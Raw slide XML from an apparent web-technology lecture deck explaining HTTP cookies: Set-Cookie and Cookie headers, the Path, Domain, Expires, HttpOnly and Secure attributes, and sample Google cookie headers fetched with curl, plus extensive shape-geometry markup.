    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109678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a:t>Embedding Information in Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Cookies are name-value pairs (seperated by "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Server includes the "Set-Cookie" header field in an HTTP response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Set-Cookie: USER=foo;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>User agent will then send the cookie back to the server using the "Cookie" header on further requests to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Cookie: USER=foo;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="1">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173970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a:t>Embedding Information in Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Server can ask for multiple cookies to be stored on the client, using multiple "Set-Cookie" headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Set-Cookie: USER=foo;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Set-Cookie: lang=en-us;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122409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a:t>Embedding Information in Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Server can sent several attributes on the cookie, these attributes are included in the Set-Cookie header line, after the cookie itself, separated by "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Specifies the path of the URI of the web server that the cookies are valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Specifies the subdomains that the cookie is valid </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Expires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Max-Age</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Used to define the lifetime of the cookie, or how long the cookie should be valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Specifies that the cookie should not be accessible to client-side scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Specifies that the cookie should only be sent over secure connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5178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1"/>
              <a:t>Embedding Information in Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Example cookie headers from curl request to www.google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>curl -v http://www.google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Set-Cookie: PREF=ID=db9539b9b7353be5:FF=0:TM=1421424672:LM=1421424672:S=OqGXMZZhmeyihyKi; expires=Sun, 15-Jan-2017 16:11:12 GMT; path=/; domain=.google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Set-Cookie: NID=67=bs1lLyrXtfdUj79IlcuqR7_MWEsyNdLWU_FpGKwlWR9QpEzi3UrVV2UGO6LBW3sJNk9mlLcYIJns3PG3NUu-M3pT9qD-V4F8oyyJ_UJnCGKDUDGbllL9Ha8KGufv0MUv; expires=Sat, 18-Jul-2015 16:11:12 GMT; path=/; domain=.google.com; HttpOnly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2937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181"/>
            <a:ext cx="8229600" cy="5882984"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Set-Cookie: PREF=ID=db9539b9b7353be5:FF=0:TM=1421424672:LM=1421424672:S=OqGXMZZhmeyihyKi; expires=Sun, 15-Jan-2017 16:11:12 GMT; path=/; domain=.google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>expires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is set two years in the future</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is / which means to send this cookie to all subpaths of www.google.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is .google.com, which means to send this cookie to all subdomains of .google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Includes www.google.com, drive.google.com, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="1">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869946" y="796021"/>
            <a:ext cx="940614"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Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699408" y="815752"/>
            <a:ext cx="7859859" cy="1463686"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1337652 w 7863773"/>
              <a:gd name="connsiteY0" fmla="*/ 27020 h 1634707"/>
              <a:gd name="connsiteX1" fmla="*/ 7850261 w 7863773"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1634707"/>
              <a:gd name="connsiteX2" fmla="*/ 7863773 w 7863773"/>
              <a:gd name="connsiteY2" fmla="*/ 1121328 h 1634707"/>
              <a:gd name="connsiteX3" fmla="*/ 2269955 w 7863773"/>
              <a:gd name="connsiteY3" fmla="*/ 1148348 h 1634707"/>
              <a:gd name="connsiteX4" fmla="*/ 2283467 w 7863773"/>
              <a:gd name="connsiteY4" fmla="*/ 1634707 h 1634707"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 7863773"/>
              <a:gd name="connsiteY5" fmla="*/ 1580667 h 1634707"/>
              <a:gd name="connsiteX6" fmla="*/ 54047 w 7863773"/>
              <a:gd name="connsiteY6" fmla="*/ 540399 h 1634707"/>
              <a:gd name="connsiteX7" fmla="*/ 1418722 w 7863773"/>
              <a:gd name="connsiteY7" fmla="*/ 567419 h 1634707"/>
              <a:gd name="connsiteX8" fmla="*/ 1391699 w 7863773"/>
              <a:gd name="connsiteY8" fmla="*/ 27020 h 1634707"/>
              <a:gd name="connsiteX9" fmla="*/ 1337652 w 7863773"/>
              <a:gd name="connsiteY9" fmla="*/ 27020 h 1634707"/>
              <a:gd name="connsiteX0" fmla="*/ 1337652 w 7890796"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1607687"/>
              <a:gd name="connsiteX1" fmla="*/ 7890796 w 7890796"/>
              <a:gd name="connsiteY1" fmla="*/ 27020 h 1607687"/>
              <a:gd name="connsiteX2" fmla="*/ 7863773 w 7890796"/>
              <a:gd name="connsiteY2" fmla="*/ 1094308 h 1607687"/>
              <a:gd name="connsiteX3" fmla="*/ 2269955 w 7890796"/>
              <a:gd name="connsiteY3" fmla="*/ 1121328 h 1607687"/>
              <a:gd name="connsiteX4" fmla="*/ 2283467 w 7890796"/>
              <a:gd name="connsiteY4" fmla="*/ 1607687 h 1607687"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 7890796"/>
              <a:gd name="connsiteY5" fmla="*/ 1553647 h 1607687"/>
              <a:gd name="connsiteX6" fmla="*/ 54047 w 7890796"/>
              <a:gd name="connsiteY6" fmla="*/ 513379 h 1607687"/>
              <a:gd name="connsiteX7" fmla="*/ 1418722 w 7890796"/>
              <a:gd name="connsiteY7" fmla="*/ 540399 h 1607687"/>
              <a:gd name="connsiteX8" fmla="*/ 1391699 w 7890796"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 1607687"/>
              <a:gd name="connsiteX9" fmla="*/ 1337652 w 7890796"/>
              <a:gd name="connsiteY9" fmla="*/ 0 h 1607687"/>
              <a:gd name="connsiteX0" fmla="*/ 1337652 w 7907507"/>
              <a:gd name="connsiteY0" fmla="*/ 6403 h 1614090"/>
              <a:gd name="connsiteX1" fmla="*/ 7907507 w 7907507"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1614090"/>
              <a:gd name="connsiteX2" fmla="*/ 7863773 w 7907507"/>
              <a:gd name="connsiteY2" fmla="*/ 1100711 h 1614090"/>
              <a:gd name="connsiteX3" fmla="*/ 2269955 w 7907507"/>
              <a:gd name="connsiteY3" fmla="*/ 1127731 h 1614090"/>
              <a:gd name="connsiteX4" fmla="*/ 2283467 w 7907507"/>
              <a:gd name="connsiteY4" fmla="*/ 1614090 h 1614090"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 7907507"/>
              <a:gd name="connsiteY5" fmla="*/ 1560050 h 1614090"/>
              <a:gd name="connsiteX6" fmla="*/ 54047 w 7907507"/>
              <a:gd name="connsiteY6" fmla="*/ 519782 h 1614090"/>
              <a:gd name="connsiteX7" fmla="*/ 1418722 w 7907507"/>
              <a:gd name="connsiteY7" fmla="*/ 546802 h 1614090"/>
              <a:gd name="connsiteX8" fmla="*/ 1391699 w 7907507"/>
              <a:gd name="connsiteY8" fmla="*/ 6403 h 1614090"/>
              <a:gd name="connsiteX9" fmla="*/ 1337652 w 7907507"/>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69955 w 7913906"/>
              <a:gd name="connsiteY3" fmla="*/ 1127731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86666 w 7913906"/>
              <a:gd name="connsiteY3" fmla="*/ 1044173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560050"/>
              <a:gd name="connsiteX1" fmla="*/ 7907507 w 7913906"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1560050"/>
              <a:gd name="connsiteX2" fmla="*/ 7913906 w 7913906"/>
              <a:gd name="connsiteY2" fmla="*/ 1033865 h 1560050"/>
              <a:gd name="connsiteX3" fmla="*/ 2286666 w 7913906"/>
              <a:gd name="connsiteY3" fmla="*/ 1044173 h 1560050"/>
              <a:gd name="connsiteX4" fmla="*/ 2283467 w 7913906"/>
              <a:gd name="connsiteY4" fmla="*/ 1463686 h 1560050"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 7913906"/>
              <a:gd name="connsiteY5" fmla="*/ 1560050 h 1560050"/>
              <a:gd name="connsiteX6" fmla="*/ 54047 w 7913906"/>
              <a:gd name="connsiteY6" fmla="*/ 519782 h 1560050"/>
              <a:gd name="connsiteX7" fmla="*/ 1418722 w 7913906"/>
              <a:gd name="connsiteY7" fmla="*/ 546802 h 1560050"/>
              <a:gd name="connsiteX8" fmla="*/ 1391699 w 7913906"/>
              <a:gd name="connsiteY8" fmla="*/ 6403 h 1560050"/>
              <a:gd name="connsiteX9" fmla="*/ 1337652 w 7913906"/>
              <a:gd name="connsiteY9" fmla="*/ 6403 h 1560050"/>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1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84848"/>
              <a:gd name="connsiteX1" fmla="*/ 7853460 w 7859859"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1484848"/>
              <a:gd name="connsiteX2" fmla="*/ 7859859 w 7859859"/>
              <a:gd name="connsiteY2" fmla="*/ 1033865 h 1484848"/>
              <a:gd name="connsiteX3" fmla="*/ 2232619 w 7859859"/>
              <a:gd name="connsiteY3" fmla="*/ 1044173 h 1484848"/>
              <a:gd name="connsiteX4" fmla="*/ 2229420 w 7859859"/>
              <a:gd name="connsiteY4" fmla="*/ 1463686 h 1484848"/>
              <a:gd name="connsiteX5" fmla="*/ 12797 w 7859859"/>
              <a:gd name="connsiteY5" fmla="*/ 1484848 h 1484848"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 7859859"/>
              <a:gd name="connsiteY6" fmla="*/ 519782 h 1484848"/>
              <a:gd name="connsiteX7" fmla="*/ 1364675 w 7859859"/>
              <a:gd name="connsiteY7" fmla="*/ 546802 h 1484848"/>
              <a:gd name="connsiteX8" fmla="*/ 1337652 w 7859859"/>
              <a:gd name="connsiteY8" fmla="*/ 6403 h 1484848"/>
              <a:gd name="connsiteX9" fmla="*/ 1283605 w 7859859"/>
              <a:gd name="connsiteY9" fmla="*/ 6403 h 1484848"/>
              <a:gd name="connsiteX0" fmla="*/ 1295975 w 7872229"/>
              <a:gd name="connsiteY0" fmla="*/ 6403 h 1476492"/>
              <a:gd name="connsiteX1" fmla="*/ 7865830 w 7872229"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1476492"/>
              <a:gd name="connsiteX2" fmla="*/ 7872229 w 7872229"/>
              <a:gd name="connsiteY2" fmla="*/ 1033865 h 1476492"/>
              <a:gd name="connsiteX3" fmla="*/ 2244989 w 7872229"/>
              <a:gd name="connsiteY3" fmla="*/ 1044173 h 1476492"/>
              <a:gd name="connsiteX4" fmla="*/ 2241790 w 7872229"/>
              <a:gd name="connsiteY4" fmla="*/ 1463686 h 1476492"/>
              <a:gd name="connsiteX5" fmla="*/ 101 w 7872229"/>
              <a:gd name="connsiteY5" fmla="*/ 1476492 h 1476492"/>
              <a:gd name="connsiteX6" fmla="*/ 12370 w 7872229"/>
              <a:gd name="connsiteY6" fmla="*/ 519782 h 1476492"/>
              <a:gd name="connsiteX7" fmla="*/ 1377045 w 7872229"/>
              <a:gd name="connsiteY7" fmla="*/ 546802 h 1476492"/>
              <a:gd name="connsiteX8" fmla="*/ 1350022 w 7872229"/>
              <a:gd name="connsiteY8" fmla="*/ 6403 h 1476492"/>
              <a:gd name="connsiteX9" fmla="*/ 1295975 w 7872229"/>
              <a:gd name="connsiteY9" fmla="*/ 6403 h 1476492"/>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34713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7 w 7859859"/>
              <a:gd name="connsiteY7" fmla="*/ 530091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496668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538447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89475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6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968752 w 7859859"/>
              <a:gd name="connsiteY0" fmla="*/ 365701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968752 w 7859859"/>
              <a:gd name="connsiteY9" fmla="*/ 365701 h 1463686"/>
              <a:gd name="connsiteX0" fmla="*/ 2043951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2043951 w 7859859"/>
              <a:gd name="connsiteY9" fmla="*/ 6403 h 14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9859" h="1463686">
                <a:moveTo>
                  <a:pt x="2043951" y="6403"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7853460" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7859859" y="1033865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2232619" y="1044173"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2231553" y="1234145"/>
                  <a:pt x="2230486" y="1273714"/>
                  <a:pt x="2229420" y="1463686"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4442" y="1459780"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2961" y="1146447"/>
                  <a:pt x="1481" y="833115"/>
                  <a:pt x="0" y="519782"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1322897" y="521736"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1325030" y="347173"/>
                  <a:pt x="1310452" y="180966"/>
                  <a:pt x="1312585" y="6403"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2043951" y="6403"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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891465" y="1820440"/>
            <a:ext cx="7676039" cy="970695"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1337652 w 7863773"/>
              <a:gd name="connsiteY0" fmla="*/ 27020 h 1634707"/>
              <a:gd name="connsiteX1" fmla="*/ 7850261 w 7863773"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1634707"/>
              <a:gd name="connsiteX2" fmla="*/ 7863773 w 7863773"/>
              <a:gd name="connsiteY2" fmla="*/ 1121328 h 1634707"/>
              <a:gd name="connsiteX3" fmla="*/ 2269955 w 7863773"/>
              <a:gd name="connsiteY3" fmla="*/ 1148348 h 1634707"/>
              <a:gd name="connsiteX4" fmla="*/ 2283467 w 7863773"/>
              <a:gd name="connsiteY4" fmla="*/ 1634707 h 1634707"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 7863773"/>
              <a:gd name="connsiteY5" fmla="*/ 1580667 h 1634707"/>
              <a:gd name="connsiteX6" fmla="*/ 54047 w 7863773"/>
              <a:gd name="connsiteY6" fmla="*/ 540399 h 1634707"/>
              <a:gd name="connsiteX7" fmla="*/ 1418722 w 7863773"/>
              <a:gd name="connsiteY7" fmla="*/ 567419 h 1634707"/>
              <a:gd name="connsiteX8" fmla="*/ 1391699 w 7863773"/>
              <a:gd name="connsiteY8" fmla="*/ 27020 h 1634707"/>
              <a:gd name="connsiteX9" fmla="*/ 1337652 w 7863773"/>
              <a:gd name="connsiteY9" fmla="*/ 27020 h 1634707"/>
              <a:gd name="connsiteX0" fmla="*/ 1337652 w 7890796"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1607687"/>
              <a:gd name="connsiteX1" fmla="*/ 7890796 w 7890796"/>
              <a:gd name="connsiteY1" fmla="*/ 27020 h 1607687"/>
              <a:gd name="connsiteX2" fmla="*/ 7863773 w 7890796"/>
              <a:gd name="connsiteY2" fmla="*/ 1094308 h 1607687"/>
              <a:gd name="connsiteX3" fmla="*/ 2269955 w 7890796"/>
              <a:gd name="connsiteY3" fmla="*/ 1121328 h 1607687"/>
              <a:gd name="connsiteX4" fmla="*/ 2283467 w 7890796"/>
              <a:gd name="connsiteY4" fmla="*/ 1607687 h 1607687"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 7890796"/>
              <a:gd name="connsiteY5" fmla="*/ 1553647 h 1607687"/>
              <a:gd name="connsiteX6" fmla="*/ 54047 w 7890796"/>
              <a:gd name="connsiteY6" fmla="*/ 513379 h 1607687"/>
              <a:gd name="connsiteX7" fmla="*/ 1418722 w 7890796"/>
              <a:gd name="connsiteY7" fmla="*/ 540399 h 1607687"/>
              <a:gd name="connsiteX8" fmla="*/ 1391699 w 7890796"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 1607687"/>
              <a:gd name="connsiteX9" fmla="*/ 1337652 w 7890796"/>
              <a:gd name="connsiteY9" fmla="*/ 0 h 1607687"/>
              <a:gd name="connsiteX0" fmla="*/ 1337652 w 7907507"/>
              <a:gd name="connsiteY0" fmla="*/ 6403 h 1614090"/>
              <a:gd name="connsiteX1" fmla="*/ 7907507 w 7907507"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1614090"/>
              <a:gd name="connsiteX2" fmla="*/ 7863773 w 7907507"/>
              <a:gd name="connsiteY2" fmla="*/ 1100711 h 1614090"/>
              <a:gd name="connsiteX3" fmla="*/ 2269955 w 7907507"/>
              <a:gd name="connsiteY3" fmla="*/ 1127731 h 1614090"/>
              <a:gd name="connsiteX4" fmla="*/ 2283467 w 7907507"/>
              <a:gd name="connsiteY4" fmla="*/ 1614090 h 1614090"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 7907507"/>
              <a:gd name="connsiteY5" fmla="*/ 1560050 h 1614090"/>
              <a:gd name="connsiteX6" fmla="*/ 54047 w 7907507"/>
              <a:gd name="connsiteY6" fmla="*/ 519782 h 1614090"/>
              <a:gd name="connsiteX7" fmla="*/ 1418722 w 7907507"/>
              <a:gd name="connsiteY7" fmla="*/ 546802 h 1614090"/>
              <a:gd name="connsiteX8" fmla="*/ 1391699 w 7907507"/>
              <a:gd name="connsiteY8" fmla="*/ 6403 h 1614090"/>
              <a:gd name="connsiteX9" fmla="*/ 1337652 w 7907507"/>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69955 w 7913906"/>
              <a:gd name="connsiteY3" fmla="*/ 1127731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614090"/>
              <a:gd name="connsiteX1" fmla="*/ 7907507 w 7913906"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1614090"/>
              <a:gd name="connsiteX2" fmla="*/ 7913906 w 7913906"/>
              <a:gd name="connsiteY2" fmla="*/ 1033865 h 1614090"/>
              <a:gd name="connsiteX3" fmla="*/ 2286666 w 7913906"/>
              <a:gd name="connsiteY3" fmla="*/ 1044173 h 1614090"/>
              <a:gd name="connsiteX4" fmla="*/ 2283467 w 7913906"/>
              <a:gd name="connsiteY4" fmla="*/ 1614090 h 1614090"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 7913906"/>
              <a:gd name="connsiteY5" fmla="*/ 1560050 h 1614090"/>
              <a:gd name="connsiteX6" fmla="*/ 54047 w 7913906"/>
              <a:gd name="connsiteY6" fmla="*/ 519782 h 1614090"/>
              <a:gd name="connsiteX7" fmla="*/ 1418722 w 7913906"/>
              <a:gd name="connsiteY7" fmla="*/ 546802 h 1614090"/>
              <a:gd name="connsiteX8" fmla="*/ 1391699 w 7913906"/>
              <a:gd name="connsiteY8" fmla="*/ 6403 h 1614090"/>
              <a:gd name="connsiteX9" fmla="*/ 1337652 w 7913906"/>
              <a:gd name="connsiteY9" fmla="*/ 6403 h 1614090"/>
              <a:gd name="connsiteX0" fmla="*/ 1337652 w 7913906"/>
              <a:gd name="connsiteY0" fmla="*/ 6403 h 1560050"/>
              <a:gd name="connsiteX1" fmla="*/ 7907507 w 7913906"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1560050"/>
              <a:gd name="connsiteX2" fmla="*/ 7913906 w 7913906"/>
              <a:gd name="connsiteY2" fmla="*/ 1033865 h 1560050"/>
              <a:gd name="connsiteX3" fmla="*/ 2286666 w 7913906"/>
              <a:gd name="connsiteY3" fmla="*/ 1044173 h 1560050"/>
              <a:gd name="connsiteX4" fmla="*/ 2283467 w 7913906"/>
